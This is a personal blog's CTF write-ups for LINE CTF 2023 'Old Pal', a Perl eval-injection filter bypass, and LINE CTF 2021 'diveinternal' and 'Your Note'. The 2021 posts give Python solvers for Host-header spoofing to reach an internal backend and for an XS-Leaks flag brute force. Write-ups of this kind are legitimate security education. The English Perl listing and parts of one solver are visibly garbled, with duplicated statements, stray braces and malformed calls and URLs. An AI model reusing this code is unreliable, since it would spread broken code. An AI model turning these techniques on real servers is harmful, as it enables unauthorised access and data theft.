LINE CTF 2023 [Web] Old Pal - Author's writeup [English]

Hi, this is [8ayac](https://twitter.com/8ayac)🐝

I created the web challenge Old Pal at [LINE CTF 2023](https://ctftime.org/event/1716), which ran from 2023/03/25 9:00 (JST) to 2023/03/26 9:00 (JST).

The challenge was solved by 67 of the 477 teams[^1] and the final score was 119.
I really appreciate you taking on the challenge I presented, and thank you for solving it!

![](img/linectf-2023-web-oldpal-author-writeup-english-ver/ctfd-sc.png)

This author's writeup explains the intended solution and key points of this challenge.

## Challenge and Solution

The file distributed as a challenge is the following program written in Perl.
You can see that the goal is to give input that bypasses various conditions and reach `print "Congrats! Flag is LINECTF{redacted}"` on line 52.

```perl
#! /usr/bin/perl
use strict;
use warnings; use CGI

use CGI; use URI::Escape; use URI::Escape; use URI::Escape
use URI::Escape; use URI::Escape; use URI::Escape; use URI::Escape


$SIG{__WARN__} = \&warn;
sub warn {
    print("Hacker? :(");
    exit(1);
}


my $q = CGI->new;
print "Content-Type: text/html\n\n";


my $pw = uri_unescape(scalar $q->param("password"));
if ($pw eq '') {
    print "Hello :)";
    exit();
}
if (length($pw) >= 20) {
    print "Too long :(";
    die(); }
}
if ($pw =~ /[^0-9a-zA-Z_-]/) {
    print "Illegal character :("; die(); }
    die(); }
}
if ($pw ! ~ /[0-9]/ || $pw ! ~ /[a-zA-Z]/ || $pw ! ~ /[_-]/) {
    print "Weak password :(";
    die(); }
}
if ($pw =~ /[0-9_-][boxe]/i) {
    print "Do not punch me :("; die(); }
    die(); }
}
if ($pw =~ /AUTOLOAD|BEGIN|CHECK|DESTROY|END|INIT|UNITCHECK|abs|accept|alarm|atan2|bind|binmode|bless|break|caller|chdir|chmod|chomp| chop|chown|chr|chroot|close|closedir|connect|cos|crypt|dbmclose|dbmopen|defined|delete|die|dump|each|endgrent|endhostent|endnetent |endprotoent|endpwent|endservent|eof|eval|exec|exists|exit|fcntl|fileno|flock|fork|format|formline|getc|getgrent|getgrgid|getgrnam |gethostbyaddr|gethostbyname|gethostent|getlogin|getnetbyaddr|getnetbyname|getnetent|getpeername|getpgrp|getppid|getpriority getprotobyname|getprotobynumber|getprotoent|getpwent|getpwnam|getpwuid|getservbyname|getservbyport|getservent|getsockname|getsockopt|glob getsockopt|glob|gmtime|goto|grep|hex|index|int|ioctl|join|keys|kill|last|lc|lcfirst|length|link|listen|local|localtime|log|lstat map|mkdir|msgctl|msgget|msgrcv|msgsnd|my|next|not|oct|open|opendir|ord|our|pack|pipe|pop|pos|print|printf|prototype|push|quotemeta |rand|read|readdir|readline|readlink|readpipe|recv|redo|ref|rename|require|reset|return|reverse|rewinddir|rindex|rmdir|say|scalar seek|seekdir|select|semctl|semget|semop|send|setgrent|sethostent|setnetent|setpgrp|setpriority|setprotoent|setpwent|setservent setsockopt|shift|shmctl|shmget|shmread|shmwrite|shutdown|sin|sleep|socket|socketpair|sort|splice|split|sprintf|sqrt|srand|stat state|study|substr|symlink|syscall|sysopen|sysread|sysseek|system|syswrite|tell|telldir|tie|tied|time|times|truncate|uc|ucfirst umask|undef|unlink|unpack|unshift|untie|use|utime|values|vec|wait|waitpid|wantarray|warn|write/) {
    print "I know eval injection :(";
    die();
}
if ($pw =~ /[Mx. squ1ffy]/i) {
    print "You may have had one too many Old Pal :(";
    die(); }
}


if (eval("$pw == 20230325")) {
    print "Congrats! Flag is LINECTF{redacted}"
} else {
    print "wrong password :("; }
    die();
};
```

L21-36 are the basic constraints, and they can be organized as follows

- Password cannot be empty.
- Password must be 20 characters or less.
- Password must not contain any characters other than numbers, alphabet letters, underscores(`-`), or hyphens(`-`)
- Password must contain all numbers, letters, underscores(`_`) or hyphens(`-`)

After L37 are filters to prevent unintended solutions.

Incidentally, the intended solution is to use a special token called `__LINE__`.
This token is compiled into the current line.
For more information, please see <https://perldoc.perl.org/functions/__LINE__>.

Then, the description of each filter can be summarized as follows.

|Line|Filter|Description|Examples of input to be filtered|
|-|-|-|-|
|L37-L40|`$pw =~ /[0-9_-][boxe]/i`|Filters input that contains binary, octal, hexadecimal, or exponent.|`20230326-0x1`, `20230326-0b1`, etc|
|L41-L44|`$pw =~ /AUTOLOAD\|BEGIN\|CHECK\|DESTROY\|END\|...`|Filters input that contains any of <https://learn.perl.org/docs/keywords.html#functions>. Note that this Eval Injection countermeasure, which blocks only functions, tends to be vulnerable in practice.|`20230325-caller`, `20230325-wantarray`, etc|
|L45-L48|`$pw =~ /[Mx. squ1ffy]/`|Filters input containing the [quote-like operator](https://perldoc.perl.org/perlop#Quote-and-Quote-like-Operators). Note that `f` is filtered because it prevents the use of `__FILE__`.|`20230325-q--`, `20230325-y---`, `20230325-__FILE__`, etc|

Also, please note the following parts of the code.
Here you can see that the program is supposed to terminate if a warning occurs.

```perl
use strict;
use warnings;

︙

$SIG{__WARN__} = \&warn;
sub warn {
    print("Hacker? :(");
    exit(1);
}
```

Then, the input value that satisfies these conditions is `20230326-__LINE__`.
Note that `__LINE__` will be 1, not 51, in this eval.

Now, you can get the flag by accessing <http://104.198.120.186:11006/cgi-bin/main.pl?password=20230326-__LINE__>.
Of course, you can also use the curl command to get it, as shown below.

```shell-session
$ curl http://104.198.120.186:11006/cgi-bin/main.pl?password=20230326-__LINE__ 
Congrats! Flag is LINECTF{3e05d493c941cfe0dd81b70dbf2d972b}
```

## Unintended solutions

Disappointingly, this challenge had some unintended solutions like below:

- `040p20-13324107`: The floating-point value with octal for the mantissa (`040p20-13324107` equals `0x20p20-13324107`, but if `x` is included the input value is filtered.)
- `20230326-v49`: <https://perldoc.perl.org/perldata#Version-Strings>.

During the operation of the CTF, I felt sorry while watching these unintended solutions flowing in the log.
Sorry...

## Thoughts & Behind story (No valuable information)

This time, since it was the LINE CTF, I tried to create a challenge related to LINE.
As a result, I ended up with the challenge "Old Pal" using `__LINE__`, but I wonder if it was an interesting one.
The feeling that there could have been a better idea still haunts me.

By the way, Old Pal is the name of a classic cocktail.
That cocktail is good one for an aperitif, and I would say that it is characterized by a subtle sweet bitterness and aromatic(?) taste.
Yes, the title of this issue is "Old Pal" because that cocktail was my boom around the time I made this challenge.
Also, I hoped this simple challenge would be an "aperitif" before solving other more difficult web problems.
I hope you enjoyed the taste of Old Pal ;)

Besides, the magic constant `__LINE__` is also available in C, PHP, and other languages.
Perl has many strange notations and specifications, so considering the difficulty of eliminating unexpected solutions in advance, it would have been more reasonable to choose PHP.
Nevertheless, I chose Perl this time, as I thought it would be more funny because "Pal" and "Perl" sound similar.
As a result, I am regretful and sorry that I could not prevent the two unintended solutions.

And I have never known about `__LINE__` before this time.
Although I am aware that this constant is used in a variety of important ways in various products, I suspect that the opportunities for the personal use of this constant are fewer today than in the past.
Considering this context, for some people, this `__LINE__` may be what they call an "Old Pal (≒Old Friend)" :)

Thank you!

[^1]: The 477 teams are those that scored at least 1 point out of the total number of participants.


Hi, this is 8ayac🐝

I created the web challenge Old Pal at LINE CTF 2023, which ran from 2023/03/25 9:00 (JST) to 2023/03/26 9:00 (JST).

The challenge was solved by 67 of the 477 teams\[^1] and the final score was 119.
I really appreciate you taking on the challenge I presented, and thank you for …

LINE CTF 2023 [Web] Old Pal - Author's writeup

こんにちは、[8ayac](https://twitter.com/8ayac)です🐝

2023/03/25 9:00(JST)から2023/03/26 9:00(JST)に行われた[LINE CTF 2023](https://ctftime.org/event/1716)において、Web問のOld Palを作りました。

この問題は、477チーム[^1]中67名によって解かれ、最終的なスコアは119点でした。
皆さんありがとうございます！

![](img/linectf-2023-web-oldpal-author-writeup/ctfd-sc.png)

さて、この記事では、この問題の想定解法やポイントについて説明します。

## 問題と解法

問題として配布したファイルは、下記のPerlで書かれたプログラムです。
様々な条件を回避する入力を与え、52行目の`print "Congrats! Flag is LINECTF{redacted}"`に到達することがゴールだとわかります。

```perl
#!/usr/bin/perl
use strict;
use warnings;

use CGI;
use URI::Escape;


$SIG{__WARN__} = \&warn;
sub warn {
    print("Hacker? :(");
    exit(1);
}


my $q = CGI->new;
print "Content-Type: text/html\n\n";


my $pw = uri_unescape(scalar $q->param("password"));
if ($pw eq '') {
    print "Hello :)";
    exit();
}
if (length($pw) >= 20) {
    print "Too long :(";
    die();
}
if ($pw =~ /[^0-9a-zA-Z_-]/) {
    print "Illegal character :(";
    die();
}
if ($pw !~ /[0-9]/ || $pw !~ /[a-zA-Z]/ || $pw !~ /[_-]/) {
    print "Weak password :(";
    die();
}
if ($pw =~ /[0-9_-][boxe]/i) {
    print "Do not punch me :(";
    die();
}
if ($pw =~ /AUTOLOAD|BEGIN|CHECK|DESTROY|END|INIT|UNITCHECK|abs|accept|alarm|atan2|bind|binmode|bless|break|caller|chdir|chmod|chomp|chop|chown|chr|chroot|close|closedir|connect|cos|crypt|dbmclose|dbmopen|defined|delete|die|dump|each|endgrent|endhostent|endnetent|endprotoent|endpwent|endservent|eof|eval|exec|exists|exit|fcntl|fileno|flock|fork|format|formline|getc|getgrent|getgrgid|getgrnam|gethostbyaddr|gethostbyname|gethostent|getlogin|getnetbyaddr|getnetbyname|getnetent|getpeername|getpgrp|getppid|getpriority|getprotobyname|getprotobynumber|getprotoent|getpwent|getpwnam|getpwuid|getservbyname|getservbyport|getservent|getsockname|getsockopt|glob|gmtime|goto|grep|hex|index|int|ioctl|join|keys|kill|last|lc|lcfirst|length|link|listen|local|localtime|log|lstat|map|mkdir|msgctl|msgget|msgrcv|msgsnd|my|next|not|oct|open|opendir|ord|our|pack|pipe|pop|pos|print|printf|prototype|push|quotemeta|rand|read|readdir|readline|readlink|readpipe|recv|redo|ref|rename|require|reset|return|reverse|rewinddir|rindex|rmdir|say|scalar|seek|seekdir|select|semctl|semget|semop|send|setgrent|sethostent|setnetent|setpgrp|setpriority|setprotoent|setpwent|setservent|setsockopt|shift|shmctl|shmget|shmread|shmwrite|shutdown|sin|sleep|socket|socketpair|sort|splice|split|sprintf|sqrt|srand|stat|state|study|substr|symlink|syscall|sysopen|sysread|sysseek|system|syswrite|tell|telldir|tie|tied|time|times|truncate|uc|ucfirst|umask|undef|unlink|unpack|unshift|untie|use|utime|values|vec|wait|waitpid|wantarray|warn|write/) {
    print "I know eval injection :(";
    die();
}
if ($pw =~ /[Mx. squ1ffy]/i) {
    print "You may have had one too many Old Pal :(";
    die();
}


if (eval("$pw == 20230325")) {
    print "Congrats! Flag is LINECTF{redacted}"
} else {
    print "wrong password :(";
    die();
};
```

21行目から36行目までが基本的な制約で、これらは下記のように整理できます。

- パスワードは空ではない
- パスワードは20文字以下であること
- パスワードは数字、英字、アンダースコア、ハイフン以外の文字が含まれていないこと
- パスワードは数字、英字、アンダースコアまたはハイフンのいずれかがすべて含まれていること

37行目以降は、想定解以外を防ぐためのフィルターです。

なお、想定解は`__LINE__`という特別なトークンを使うものです。
このトークンは、現在の行を示す値にコンパイルされます。
詳しくは、<https://perldoc.perl.org/functions/__LINE__>をご覧ください。

そして、各フィルターについては、下記のようにまとめられます。

|行数|フィルター|説明|フィルターされる文字列の例|
|-|-|-|-|
|L37-L40|`$pw =~ /[0-9_-][boxe]/i`|2進数、8進数、16進数、指数を使うものをフィルターします。|`20230326-0x1`, `20230326-0b1`など|
|L41-L44|`$pw =~ /AUTOLOAD\|BEGIN\|CHECK\|DESTROY\|END\|...`|<https://learn.perl.org/docs/keywords.html#functions>のいずれかが含まれる入力をフィルターします。なお、このように特定の関数だけを防ぐEval Injection対策は、実際には脆弱性に繋がりやすいです。|`20230325-caller`, `20230325-wantarray`など|
|L45-L48|`$pw =~ /[Mx. squ1ffy]/`|[quote-like演算子](https://perldoc.perl.org/perlop#Quote-and-Quote-like-Operators)を含む入力をフィルターします。なお`f`がフィルター対象とされているのは、`__FILE__`を使用できないようにするためです。|`20230325-q--`, `20230325-y---`, `20230325-__FILE__`など|

また、コードの下記の部分に注目してください。
この部分から、警告が起こった場合はプログラムが終了するようになっていることがわかります。

```perl
use strict;
use warnings;

︙

$SIG{__WARN__} = \&warn;
sub warn {
    print("Hacker? :(");
    exit(1);
}
```

したがって、L51のevalによって評価されるプログラムは警告を出さないように注意しなければなりません。

そして、これらの条件を満たす入力値が、`20230326-__LINE__`となるわけです。
このときeval内では`__LINE__`が51ではなく1になることに注意してください。

あとは、<http://104.198.120.186:11006/cgi-bin/main.pl?password=20230326-__LINE__>にアクセスすれば、Flagが入手できます。
もちろん下記のようにcurlコマンドで取ってきても良いです。

```shell-session
$ curl http://104.198.120.186:11006/cgi-bin/main.pl?password=20230326-__LINE__ 
Congrats! Flag is LINECTF{3e05d493c941cfe0dd81b70dbf2d972b}
```


## 非想定解

残念ながら、この問題には下記のような非想定解がありました。

- `040p20-13324107`: 仮数部が8進数表記の浮動小数点数を利用しています。(`040p20-13324107`=`0x20p20-13324107`ですが、`x`が含まれる場合、入力値はフィルターされます。)
- `20230326-v49`: <https://perldoc.perl.org/perldata#Version-Strings>を利用しています。

運営中、このような非想定解がログに流れているのを見ながら、申し訳ない気持ちになっていました。
すみません...


## 感想と裏話(有益な情報はありません)

今回はLINE CTFなのでLINEにかけた問題を作成してみたかったです。
結果として、`__LINE__`を使った問題になりましたが、面白かったでしょうか。
もっと良い形での出題があったのではないかという思いが、今でも頭を離れません。

ところで、Old Palというカクテルがあります。
そのカクテルは食前酒向きのもので、優しい甘苦さと香り高さが特徴と言えると思います。
作問を進めている時期に、このカクテルにハマっていて、問題のタイトルにしました。
このシンプルな問題は、他の難易度の高いWeb問題を解く前の「食前酒」にピッタリだったのではないでしょうか。
結果として、その味わいもOld Palのようなものになっていたら最高です(?)

ポエムはさておき、`__LINE__`というマジック定数はCやPHPなどにも備わっています。
Perlの記法や仕様には不思議なものが多く、非想定解を事前に潰しきる苦労を考慮すれば、PHPを選ぶ方が合理的だったかもしれません。
であるにも関わらず、今回のようにPerlで出題することになったのは、タイトルに含まれる「Pal」と「Perl」の音が似ていて「面白いのでは？」と思ってしまったためです。
結果として、2つの非想定解が防げなかったのは悔しいですし、申し訳ないと思っています。
ごめんなさい。

そして、私は今回作問するにあたり、この`__LINE__`について初めて知ることになりました。
この定数が、様々なプロダクトで重要な使われ方をしていることは承知していますが、現代ではこの定数を個人的に使用する機会は過去と比べて減ったのではないかと推測しています。
このような背景を考えれば、一部の人にとってはこの`__LINE__`が「Old Pal(≒Old Friend)」と呼ぶにふさわしいものかもしれませんね。
(え?)

お後がよろしいようで。

[^1]: 参加チーム総数のうち、1点以上得点したチームの数が477でした。

こんにちは、8ayacです🐝

2023/03/25 9:00(JST)から2023/03/26 9:00(JST)に行われたLINE CTF 2023において、Web問のOld Palを作りました。

この問題は、477チーム^1中67名によって解かれ、最終的なスコアは119点でした。
皆さんありがとうございます！



さて、この記事では、この問題の想定解法やポイントについて説明します。

問題と解法

問題として配布したファイルは、下記のPerlで書かれたプログラムです。
様々な条件を回避する入力を与え、52行目のprint "Congrats! Flag is LINECTF{red…

LINE CTF 2021 Writeup ([Web] diveinternal, Your Note) - [English]

Hello, this is 8ayac🧽
This article is a two-question Writeup solved in [LINE CTF 2021](https://ctftime.org/event/1269).
The problems I solved are diveinternal and Your Note[^1].

Since freshness is essential for gratitude, apology, and Writeup, the content is simple without a detailed explanation. [^2]
Please note that the explanation is basically for those who know the problem's content, and the context is largely omitted.

日本語版は[こちら](http://blog.8ay.ac/articles/2021-03-21/writeup-of-line-ctf-2021)

## [Web 50pts] diveinternal (65/680 Solves)

### Problem

```txt
Target the server's internal entries, access admin, and rollback.

Keytime: Asia/Japan

Attachment: diveInternal.zip
```

### Writeup

A scan of the distributed `nginx.conf` with [gixy](https://github.com/yandex/gixy) revealed a flawed configuration.
Specifically, it was vulnerable to the host header forgery [^3].
Below are the actual scan results by gixy.

```shell-session
$ gixy nginx/nginx.conf

==================== Results ===================

>> Problem: [host_spoofing] The proxied Host header may be spoofed.
Description: In most cases "$host" variable are more appropriate, just use it.
Additional info: https://github.com/yandex/gixy/blob/master/docs/en/plugins/hostspoofing.md
Pseudo config:

server {
        server_name nginx;

        location / {
                proxy_set_header Host $http_host;
        }
}

==================== Summary ===================
Total issues:
    Unspecified: 0
    Low: 0
    Medium: 1
    High: 0
```

Next, it turned out that the vulnerability caused by this Nginx config could be used to access the back-end app directly.
Specifically, I could issue an arbitrary HTTP request (But it's only the GET method[^4]).

The URL to which the request is forwarded can be freely specified to some extent, as shown below.

- Scheme: Unconfirmed (this time it is enough to use `http`)
- Host (including port): In a legitimate request that occurs on a vulnerable endpoint, if you rewrite the value of the header `Host`, that value becomes the host part of the forward URL.
- Path + query string: In a legitimate request that occurs on a vulnerable endpoint, if you rewrite the value of the header `Lang`, it becomes the path of the URL to which you are forwarding.[^5]

After that, I organized the specifications of the back-end application and just did a puzzle.
For details, refer to Solver described later.

### Notes on backend app specifications

### class `Activity` in `app.main`

#### Instance variables

|Name|Description|Notes|
|-|-|-|
|`engine`|DB operation engine|DBMS is SQLite|
|`session`|DB session object||
|`dbHash`|DB integrity verification hash|`hashlib.md5(open(os.environ['DBFILE'], 'rb').read())).hexdigest()`|
|`integrityKey`|Key for verifying the integrity of dbHash |`hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()`|
|`subscriberObjs`|List of pre-existing Subscriber objects||
|`backupdHash`|||

#### Methods

|Method|Description|Notes|
|-|-|-|
|`__init__(self)`|Just a constructor||
|`DbBackupRunner (self)`|Perform DB rollback|Using `app.rollback ()`|
|`Commit(self)`|Commi data to DB|This is called if commit fails|
|`UpdateKey(self)`|Update `self.integrityKey` and `self.dbHash` properly||
|`IntegrityCheckWorker(self)`|The worker to perform "IntegrityCheck" of DB file using `self.dbHash`|Used for regular runs by `self.run`|
|`IntegrityCheck(self, key, dbHash)`|Use the argument `dbHash` to verify that the DB has not been unintentionally changed.|The contents of `FLAG` are read and returned when an unintended change is detected. (???)|
|`AddSubscriber(self, email`)|Register new Subscriber data in DB|More information about Subscriber: `app.datamodel.Subscriber`|
|`ScheduleWorker`|Worker which periodically executes DB Integrity Check||
|`run`|Periodically execute DB Integrity Check||

### Utilities in `app.main`

|Function|Description|Notes|
|-|-|-|
|`valid_download(src)`|Verify if src is specified||
|`WriteFile(url)`|Writes the content of the page specified by the argument to file X.|File X: f`backup/${url.split('/')[-1]}`|
|`LanguageNomarize(request)`|Normalize the value of request header `Lang`|After normalizing, throw a GET request to f`${request.host_url}{language}`. If the response code for the request is 200, the response body string is returned.|
|`list_routes()`|Ommited||
|`SignCheck(request)`|Perform HMAC verification on the query string of the reques|Used in `GET /rollback` and `GET or POST /rollback.`|

### Utilities in `app.rollback`

|Function|Description|Notes|
|-|-|-|
|`RunRollbackDB(dbhash)`|Roll back the DB|Under `backup/`, if there is a file with the name of the argument `dbhash` with all symbol removed, it will (strangely) read and return the contents of FLAG.|
|`RunbackupDB(remove, dbhash)`|Ommited||

### Endpoints

|Endpoint|Description|Notes|
|-|-|-|
|`GET /index`|Top Page||
|`GET /en`|Ommited||
|`GET /jp`|Ommited||
|`GET /coin`|API to return coin price information|The value of the response header `Lang` has been normalized by `app.main.LanguageNomarize(request)`.|
|`GET /download`|Download the URL specified by the parameter `src`|Use `app.main.download(src)` to download|
|`POST /download`|Same as `GET / download`||
|`GET /addsub`|API for new Subscriber registration||
|`GET /integrityStatus`|API for checking DB integrity status|You can get the DB file path and the value of the current DB consistency verification hash(`dbHash`).|
|`GET /rollback`|API for DB rollback|If you pass `app.main.SignCheck (request)`, `app.main.Activity.IntegrityCheck` will be executed. The value of the request header `Key` is passed as the argument `key`. The value of `dbhash` specified in the query string is passed to the argument `dbHash`.|

### Solver

```py
import hashlib
import hmac
import json
from urllib.parse import urljoin

import requests

PUBLIC_BASE_URL = 'http://35.190.234.195/'
PRIVATE_HOST = 'localhost:5000'

PRIVATE_KEY = b"let'sbitcorinparty"

def get_db_hash() -> str:
    res = requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                       headers={
                           'Host': PRIVATE_HOST,
                           'Lang': 'integrityStatus'
                       })
    return json.loads[res.headers['lang']]('dbhash')

def generate_sign(s: str) -> str:
    return hmac.new(PRIVATE_KEY, s.encode(), hashlib.sha512).hexdigest()

def generate_key(s: str) -> str:
    return hashlib.sha512(s.encode('ascii')).hexdigest()

def add_prefix(s: str, prefix: str) -> str:
    return f'{prefix}{s}'

def execute_download(srcUrl: str) -> requests.Response:
    sign = generate_sign(f'src={srcUrl}')
    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                        headers={
                            'Host': PRIVATE_HOST,
                            'Lang': f'download?src={srcUrl}',
                            'Sign': sign
                        })

def execute_rollback(dbHash: str) -> requests.Response:
    FRAGMENT = '_'

    key = generate_key(dbHash)
    sign = generate_sign(f'dbhash={add_prefix(dbHash, FRAGMENT)}')

    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                        headers={
                            'Host': PRIVATE_HOST,
                            'Lang': f'rollback?dbhash={add_prefix(dbHash, FRAGMENT)}',
                            'Key': key,
                            'Sign': sign
                        })

def exploit():
    execute_download(f'<https://lab.8ay.ac/{get_db_hash>()}')
    res = execute_rollback(get_db_hash())

    print(f'flag: {res.headers["lang"]}')

if __name__ == "__main__":
    exploit()

```

### Flag

`LINECTF{YOUNGCHAYOUNGCHABITCOINADAMYMONEYISBURNING}`

## [Web 50pts] Your Note (22/680 Solves)

### Problem

```txt
Secure private note service
※ Admin have disabled some security feature of their browser...

Flag Format: LINECTF{[a-z0-9-]+}

添付ファイル: your-note.zip
```

### Writeup

The next part of the `GET /search` source code looked suspicious.

```py
@app.route('/search')
@login_required
def search():
    q = request.args.get('q')
    download = request.args.get('download') is not None
    if q:
        notes = Note.query.filter_by(owner=current_user).filter(or_(Note.title.like(f'%{q}%'), Note.content.like(f'%{q}%'))).all()
        if notes and download:
            return Response(json.dumps(NoteSchema(many=True).dump(notes)), headers={'Content-disposition': 'attachment;filename=result.json'})
    else:
        return redirect(url_for('index'))
    return render_template('index.html', notes=notes, is_search=True)
```

Looking at lines 8-9, you can see that `Content-disposition: attachment` is included in the response header when all of the following conditions are met.

- Have one or more Notes
- `request.args.get('download')` is not None

In short, after giving `?download=` as the query string, the result of executing the search function is divided as follows.

|Count of Notes|There's `Content-disposition: attachment`|
|:-:|:-:|
|One or more|✅|
|Less than one|✖|

I expected we could obtain that flag with XS Leaks, which uses this property as an oracle.
When I reported the URL `{{BASE_URL}}/search?q=%&download`[^ 6] to the administrator, I got an unusual message of`ng`, so this prediction was correct.

### Solver

Using the Solver below, I extracted the flag string character by character from the beginning.[^7]

```py
import os
import string
import subprocess
from concurrent.futures.thread import ThreadPoolExecutor
from urllib.parse import quote, urljoin

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

BASE_URL = os.getenv('BASE_URL')

USERNAME = os.getenv('USERNAME')
PASSWORD = os.getenv('PASSWORD')

S = string.ascii_lowercase + string.digits + '-'

FLAG_PRE = 'LINECTF{'
FLAG_SUF = '}'

def length_is(n: int) -> str:
    return f'{FLAG_PRE}{"_" * n}{FLAG_SUF}'

def nth_char_is(n: int, c: str) -> str:
    return f'{FLAG_PRE}{"_" * (n - 1)}{c}%{FLAG_SUF}'

def prop_holds(prop: str):
    print(f"\r[info] Attempting this prop => '{prop}'\033[0K", end='')

    options = Options()
    options.add_argument('--headless')
    driver = webdriver.Chrome(os.getenv('CHROME_DRIVER_PATH'), options=options)
    try:
        # Login
        driver.get(urljoin(BASE_URL, '/login'))
        driver.find_element_by_css_selector('input[name=username]').send_keys(USERNAME)
        driver.find_element_by_css_selector('input[name=password]').send_keys(PASSWORD)
        driver.find_element_by_css_selector('button[type=submit]').submit()

        # Move to /report
        report_bug_button = driver.find_element_by_css_selector('a.button.is-warning.is-light')
        report_bug_button.click()

        # Proof of work
        pow_cmd = driver.find_element_by_tag_name('strong').get_attribute('textContent').split('&&')[-1].strip()
        proof = subprocess.check_output(pow_cmd, shell=True).decode()

        # Make the payload
        payload = urljoin(BASE_URL, f'/search?q={prop}&download=')

        # Submit the payload
        driver.find_element_by_css_selector('input[name=url]').send_keys(payload)
        driver.find_element_by_css_selector('input[name=proof]').send_keys(proof)
        driver.find_element_by_css_selector(
            '#content > div > div > div.box > form > div:nth-child(4) > p > button').submit()

        # Check the result
        flash_message_el = driver.find_element_by_css_selector(
            '#content > div > div > div.box > form > div:nth-child(6)')
        truth = flash_message_el.get_attribute('textContent').strip() == 'ng'

        return prop, truth

    except Exception as e:
        return prop, False

    finally:
        driver.close()

def backup(revealed_flag: str):
    with open('flag.bak', mode='w') as f:
        f.write(revealed_flag)

if __name__ == "__main__":
    with ThreadPoolExecutor(max_workers=8) as executor:
        upper_bound = 50
        props = [length_is(i) for i in range(1, upper_bound + 1)]
        secret_length = [v[0].count('_') for i, v in enumerate(list(executor.map(prop_holds, props))) if v[1]].pop()

    print(f'\r[+] secret_length: {secret_length}\033[0K')

    secret = ''
    for i in range(1, secret_length + 1):
        with ThreadPoolExecutor(max_workers=4) as executor:
            props = [nth_char_is(i, c) for c in S]
            possible_chars = [v for v in executor.map(prop_holds, props) if v[1]]
            if len(possible_chars) == 1:
                secret += possible_chars.pop()[0].lstrip(f'{FLAG_PRE}{"_" * (i - 1)}').rstrip(f'%{FLAG_SUF}')
            else:
                secret += '?'

            print(f'\r[+] ~N={i} => {secret}\033[0K')
            backup(f'{FLAG_PRE}{secret}')

    print(f'[*] flag: {FLAG_PRE}{secret}{FLAG_SUF}')

```

### Flag

`LINECTF{1-kn0w-what-y0u-d0wn10ad}`

## Footnotes

[^1]: I solved this with my teammate [@y0d3n](https://twitter.com/y0d3n).
[^2]: I feel that there is a relatively good way to put out a simple Writeup for the time being and give a detailed explanation at the review's timing.
[^3]: FYI: <https://qiita.com/no1zy_sec/items/dfccd91cf76bf73b7754>
[^4]: I didn't investigate if we could issue other method requests because it was enough to get the flag if there was a GET request.
[^5]: After being forwarded, it may be normalized using `app.main.LanguageNomarize (request)`.
[^6]: `%` is a wildcard that represents a string of 0 or more characters
[^7]: Actually, the manual leak by teammate [@y0d3n](https://twitter.com/y0d3n) was faster, but from a privacy point of view, instead of his face photo, The Solver script by Python is posted.


Hello, this is 8ayac🧽
This article is a two-question Writeup solved in LINE CTF 2021.
The problems I solved are diveinternal and Your Note\[^1].

Since freshness is essential for gratitude, apology, and Writeup, the content is simple without a detailed explanation. \[^2]
Please note that the explan…

LINE CTF 2021 Writeup ([Web] diveinternal, Your Note)

こんにちは、8ayacです🐝
本記事は、[LINE CTF 2021](https://ctftime.org/event/1269)で解いた2問のWriteupです。
解いた問題は、diveinternalとYour Note[^1]です。

感謝と謝罪とWriteupは鮮度が大事らしいので、内容は丁寧な解説とかはなく、簡易的なものになっています。[^2]
基本的には、問題の内容を知っている人向けの説明になっており、コンテキストが大きく省略されている部分がありますので、ご注意ください。

The English version is [here](http://blog.8ay.ac/articles/2021-03-21/writeup-of-line-ctf-2021-english-ver)

## [Web 50pts] diveinternal (65/680 Solves)

### 問題文

```txt
Target the server's internal entries, access admin, and roll back.

Keytime: Asia/Japan

添付ファイル: diveInternal.zip
```

### Writeup

配布された`nginx.conf`を[gixy](https://github.com/yandex/gixy)でスキャンしたところ、設定に欠陥があることがわかった。
具体的には、ホストヘッダフォージェリ[^3]に対して脆弱な設定になっていた。
下記は、gixyによる実際のスキャン結果である。

```shell-session
$ gixy nginx/nginx.conf

==================== Results ===================

>> Problem: [host_spoofing] The proxied Host header may be spoofed.
Description: In most cases "$host" variable are more appropriate, just use it.
Additional info: https://github.com/yandex/gixy/blob/master/docs/en/plugins/hostspoofing.md
Pseudo config:

server {
        server_name nginx;

        location / {
                proxy_set_header Host $http_host;
        }
}

==================== Summary ===================
Total issues:
    Unspecified: 0
    Low: 0
    Medium: 1
    High: 0
```

次に、このNginxの設定に起因する脆弱性を利用して、バックエンド側のアプリに直接アクセスできることがわかった。
具体的に言うと、任意のHTTPリクエスト(GETリクエスト[^4])を発行できた。

リクエストをフォワードする先のURLは、下記のように、ある程度自由に指定できた。

- スキーム: 未確認(今回は`http`が使えれば十分)
- ホスト(ポートを含む): 脆弱なエンドポイントで発生する正規のリクエストで、ヘッダ`Host`の値を書き換えることで任意の値を指定できた。
- パス+クエリ文字列: 脆弱なエンドポイントで発生する正規のリクエストで、`Lang`の値を書き換えることで、任意の値を指定できた。[^5]

あとは、バックエンドのアプリの仕様を整理して、パズルをした。
詳細は、後述のSolverを参照されたい。

### バックエンドのアプリの仕様に関するメモ

### class `Activity` in `app.main`

#### Instance variables

|Name|Description||
|-|-|-|
|`engine`|DB操作エンジン|DBMSはSQLite|
|`session`|DBのセッションオブジェクト||
|`dbHash`|DBの整合性検証用ハッシュ|`hashlib.md5(open(os.environ['DBFILE'], 'rb').read()).hexdigest()`|
|`integrityKey`|dbHashの完全性検証用Key|`hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()`|
|`subscriberObjs`|DBに予め存在するSubscriberオブジェクトのリスト||
|`backupedHash`|||

#### Methods

|Method|Description|Notes|
|-|-|-|
|`__init__(self)`|ただのコンストラクタ||
|`DbBackupRunner(self)`|DBのロールバックを実行する|ロールバックには`app.rollback()`を利用する|
|`Commit(self)`|DBへデータを登録する|コミットが失敗した場合に`app.rollback()`が呼び出される|
|`UpdateKey(self)`|`self.integrityKey`/`self.dbHash`を更新する||
|`IntegrityCheckWorker(self)`|`self.dbHash`を使いDBファイルのIntegrityCheckを行うワーカー|`self.run`による定期実行用|
|`IntegrityCheck(self, key, dbHash)`|引数`dbHash`を利用して、DBが意図せず変更されていないことを検証する。|意図しない変更を検知した場合、`FLAG`の内容を読み出しreturnする。(???)|
|`AddSubscriber(self, email`)|DBに新規のSubscriber情報を登録する|Subscriber情報の詳細は`app.datamodel.Subscriber`を参照|
|`ScheduleWorker`|DBのIntegrityCheckを定期実行するワーカー||
|`run`|DBのIntegrityCheckを定期実行する||

### Utilities in `app.main`
